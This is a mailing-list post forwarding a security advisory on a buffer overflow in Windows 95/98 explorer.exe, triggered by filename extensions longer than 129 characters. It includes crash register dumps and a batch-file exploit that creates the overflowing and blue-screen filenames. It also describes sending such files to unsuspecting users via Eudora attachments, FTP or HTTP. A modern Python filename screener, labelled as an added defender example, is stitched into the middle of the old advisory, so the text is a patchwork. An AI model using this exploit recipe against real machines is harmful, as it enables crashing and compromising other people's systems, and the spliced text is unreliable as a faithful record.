From: Dike<[EMAIL PROTECTED]>

All, while I'm at it I'll just forward the news, sorry if it's long :)

Dike
NB: if I come across security/bug etc. news, do you want me to post it to the list? :)

Windows 9x's explorer.exe contains a buffer overflow (long filenames)
--------------------------------------------------------------------------------


SUMMARY

When Microsoft Windows Explorer tries to access a filename whose extension 
contains more than 129 characters, a buffer overflow occurs. This overflow 
can be exploited to run arbitrary code, and since Explorer is used by many 
products as a shell, the vulnerability can be exploited remotely.

DETAILS

Vulnerable systems:
Windows 95
Windows 98
Windows 98 Second Edition

When Explorer tries to access a filename whose extension contains more than 
129 characters, a buffer overflows and you get an error similar to this:

EXPLORER caused an invalid page fault in
module <unknown> at 0000:61616161.
Registers:
EAX=61616161 CS=0187 EIP=61616161 EFLGS=00010246
EBX=80070032 SS=018f ESP=01a1d8fc EBP=61616161
ECX=c16b6f10 DS=018f ESI=01d0bd3c FS=5047
EDX=81724974 ES=018f EDI=7fcbd320 GS=0000
Bytes at CS:EIP:

Stack dump:
61616161 61616161 61616161 61616161 61616161 61616161 61616161 
61616161 61616161 61616161 61616161 61616161 61616161 61616161 
61616161 61616161 

As you can see, EIP was overwritten during this overflow, which means that 
code contained in the filename can be executed.

247 + 129 + 118 bytes are available to store data such as shellcode. If you 
also add some extra special characters to the filename, you can cause it to 
be recognized as write-only in Windows (and not found in DOS).

Exploit:
A) Creating such a file

place the following code in a .bat file: 

---- cut here
  
echo This will create a file that when clicked upon in windows
echo explorer or any other program that calls explorer.exe for 
echo file management will cause a buffer overflow.

dir *.* > _�.�------Buffer overflow-----------aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

echo This will cause a Blue screen of death
echo Just to show you it is possible to execute remote code.
echo (all it does is overwrite the return address with a false one.)

dir *.* > _�.�------Blue-screen-of-death------aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa12345678�AAAAAAAAAA

--- cut here
  
now run the .bat file

B) Using this bug on remote computers:

Eudora Pro mail client:
 You could attach the file to an e-mail and send it to an unsuspecting 
computer user. When he checks his e-mail and the mail program attempts to 
save the attachment to disk, the program will crash due to a buffer 
overflow.
 
EUDORA caused an invalid page fault in
module EUDORA.EXE at 0187:00428b05.
Registers:
EAX=007f0394 CS=0187 EIP=00428b05 EFLGS=00010206
EBX=00000000 SS=018f ESP=007eff88 EBP=007f0764
ECX=006a305c DS=018f ESI=007f07a8 FS=582f
EDX=007eff8c ES=018f EDI=8173b024 GS=0000
Bytes at CS:EIP:
56 50 51 52 ff 15 50 9f 63 00 8b 15 80 2c 6b 00 
Stack dump:

FTP Upload, HTTP Download or DCC Sends:
Uploading a file with this name to an FTP server, or placing it on an HTTP 
server for download, lets an attacker spread the file (which can contain 
arbitrary code). An attacker can also use a remote site's automatic file 
integrity checks (run after a file is uploaded) to compromise that site.
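As an added defender-side example (not part of the advisory), the following screener flags attachment or upload filenames shaped like the one described above: an extension longer than 129 characters, or characters outside printable ASCII of the kind used to hide the file from DOS. The sample names are constructed; since the advisory's exact special bytes are not recoverable from the page, the byte 0xFF stands in for them (an assumption).

```python
# Added example: screen filenames (e.g. mail attachments or FTP uploads) for the
# pattern in the Windows 9x explorer.exe advisory. Not the advisory's own code.

EXT_LIMIT = 129  # the advisory's threshold: more than 129 chars in the extension


def split_extension(name: str):
    """Return (stem, extension) of the final path component, using the last '.'."""
    base = name.rsplit("/", 1)[-1].rsplit("\\", 1)[-1]
    if "." not in base:
        return base, ""
    stem, ext = base.rsplit(".", 1)
    return stem, ext


def suspicious_chars(name: str):
    """Characters outside printable ASCII (control chars, high-bit bytes)."""
    return sorted({c for c in name if not (0x20 <= ord(c) < 0x7F)})


def assess_filename(name: str) -> dict:
    """Report why a filename looks like the overflow trigger, if it does."""
    _stem, ext = split_extension(name)
    findings = []
    if len(ext) > EXT_LIMIT:
        findings.append(f"extension length {len(ext)} exceeds {EXT_LIMIT}")
    odd = suspicious_chars(name)
    if odd:
        codes = ", ".join(f"U+{ord(c):04X}" for c in odd)
        findings.append(f"non-printable/non-ASCII characters: {codes}")
    return {"name": name, "ext_len": len(ext), "findings": findings,
            "risky": bool(findings)}


# Constructed sample names (not real attachments). 0xFF is an assumed stand-in
# for the advisory's unrecoverable special bytes; the extension here is 133 chars.
SAMPLES = [
    "report.txt",
    "_\xff.\xff" + "-" * 6 + "Buffer-overflow" + "-" * 11 + "a" * 100,
    "archive." + "b" * 129,  # exactly at the limit: not flagged
]

if __name__ == "__main__":
    for n in SAMPLES:
        r = assess_filename(n)
        status = "RISKY" if r["risky"] else "ok   "
        print(f"{status} ext_len={r['ext_len']:<4} {'; '.join(r['findings'])}")
```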


ADDITIONAL INFORMATION

The information was provided by:  <mailto:[EMAIL PROTECTED]> Zoa_Chien.
--
Compu-Mania MailingList, provided by PT Centrin Utama
Unsubscribe: [EMAIL PROTECTED], body: unsubscribe Compu-Mania
Archive: http://www.mail-archive.com/[email protected]/
Info: [EMAIL PROTECTED], body: help
